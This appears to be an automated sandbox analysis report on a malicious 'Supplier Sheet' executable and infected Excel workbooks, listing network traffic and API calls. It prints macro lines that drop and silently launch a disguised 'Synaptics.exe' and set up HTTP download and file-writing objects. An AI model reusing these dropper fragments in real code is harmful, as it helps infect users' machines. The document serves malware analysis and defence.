                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59854
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60043
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59860
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60042
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59968 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59903
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59902
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59904
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59901
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59868 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59902 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59818 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59914
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59913
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59915
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59913 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59912
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59934 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59853 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59880 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59924 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59925
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59819 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59924
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59892 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59923
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59922
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59847 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59819
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59818
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59841 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59937
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59934
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59933
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59820
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59941
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59830 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59957 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59901 -> 443
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49710 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49712 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49711 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49723 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49721 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49727 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49774 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49809 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49808 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59828 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59829 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59841 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59840 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59866 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59867 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59902 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59904 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:59912 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:59915 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59958 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59957 version: TLS 1.2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00DC7099
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00DC7294
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00947294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00947294
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00DC7099
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_00DB4342

                                System Summary

                                barindex
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: zWdpyzM9.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: GLTYDMDUST.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: zWdpyzM9.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: GLTYDMDUST.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: zWdpyzM9.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: GLTYDMDUST.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00D729C2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DE02AA NtdllDialogWndProc_W,2_2_00DE02AA
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDE769 NtdllDialogWndProc_W,CallWindowProcW,2_2_00DDE769
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00DDEAA6
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDEA4E NtdllDialogWndProc_W,2_2_00DDEA4E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8AC99 NtdllDialogWndProc_W,2_2_00D8AC99
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00DDECBC
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,2_2_00D8AD5C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8AFB4 GetParent,NtdllDialogWndProc_W,2_2_00D8AFB4
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00DDEFA8
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF0A1 SendMessageW,NtdllDialogWndProc_W,2_2_00DDF0A1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00DDF122
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF3DA NtdllDialogWndProc_W,2_2_00DDF3DA
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF3AB NtdllDialogWndProc_W,2_2_00DDF3AB
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF37C NtdllDialogWndProc_W,2_2_00DDF37C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF45A ClientToScreen,NtdllDialogWndProc_W,2_2_00DDF45A
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF425 NtdllDialogWndProc_W,2_2_00DDF425
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDF594 GetWindowLongW,NtdllDialogWndProc_W,2_2_00DDF594
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8B7F2 NtdllDialogWndProc_W,2_2_00D8B7F2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8B845 NtdllDialogWndProc_W,2_2_00D8B845
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDFE80 NtdllDialogWndProc_W,2_2_00DDFE80
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDFE7D NtdllDialogWndProc_W,2_2_00DDFE7D
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_00DDFF91
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_00DDFF04
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008F29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_008F29C2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009602AA NtdllDialogWndProc_W,9_2_009602AA
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095E769 NtdllDialogWndProc_W,CallWindowProcW,9_2_0095E769
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,9_2_0095EAA6
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095EA4E NtdllDialogWndProc_W,9_2_0095EA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090AC99 NtdllDialogWndProc_W,9_2_0090AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_0095ECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,9_2_0090AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090AFB4 GetParent,NtdllDialogWndProc_W,9_2_0090AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_0095EFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F0A1 SendMessageW,NtdllDialogWndProc_W,9_2_0095F0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_0095F122
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F3AB NtdllDialogWndProc_W,9_2_0095F3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F3DA NtdllDialogWndProc_W,9_2_0095F3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F37C NtdllDialogWndProc_W,9_2_0095F37C
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F425 NtdllDialogWndProc_W,9_2_0095F425
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F45A ClientToScreen,NtdllDialogWndProc_W,9_2_0095F45A
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095F594 GetWindowLongW,NtdllDialogWndProc_W,9_2_0095F594
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090B7F2 NtdllDialogWndProc_W,9_2_0090B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090B845 NtdllDialogWndProc_W,9_2_0090B845
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095FE80 NtdllDialogWndProc_W,9_2_0095FE80
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095FE7D NtdllDialogWndProc_W,9_2_0095FE7D
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_0095FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_0095FF04
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB70AE: CreateFileW,DeviceIoControl,CloseHandle,2_2_00DB70AE
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DAB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74F25590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_00DAB9F1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00DB82D0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009382D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_009382D0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DD30AD2_2_00DD30AD
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D836802_2_00D83680
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D7DCD02_2_00D7DCD0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D7A0C02_2_00D7A0C0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D901832_2_00D90183
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB220C2_2_00DB220C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D785302_2_00D78530
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D766702_2_00D76670
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D906772_2_00D90677
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA87792_2_00DA8779
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DDA8DC2_2_00DDA8DC
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D90A8F2_2_00D90A8F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D76BBC2_2_00D76BBC
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D9AC832_2_00D9AC83
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D78CA02_2_00D78CA0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8AD5C2_2_00D8AD5C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D90EC42_2_00D90EC4
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA4EBF2_2_00DA4EBF
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA113E2_2_00DA113E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D912F92_2_00D912F9
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA542F2_2_00DA542F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA599F2_2_00DA599F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D9DA742_2_00D9DA74
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D7BDF02_2_00D7BDF0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D9BDF62_2_00D9BDF6
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D75D322_2_00D75D32
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D91E5A2_2_00D91E5A
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA7FFD2_2_00DA7FFD
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBBFB82_2_00DBBFB8
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D9DF692_2_00D9DF69
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008FDCD09_2_008FDCD0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008FA0C09_2_008FA0C0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009101839_2_00910183
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093220C9_2_0093220C
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008F85309_2_008F8530
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009106779_2_00910677
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008F66709_2_008F6670
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009287799_2_00928779
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0095A8DC9_2_0095A8DC
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00910A8F9_2_00910A8F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008F6BBC9_2_008F6BBC
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00902B409_2_00902B40
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0091AC839_2_0091AC83
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008F8CA09_2_008F8CA0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090AD5C9_2_0090AD5C
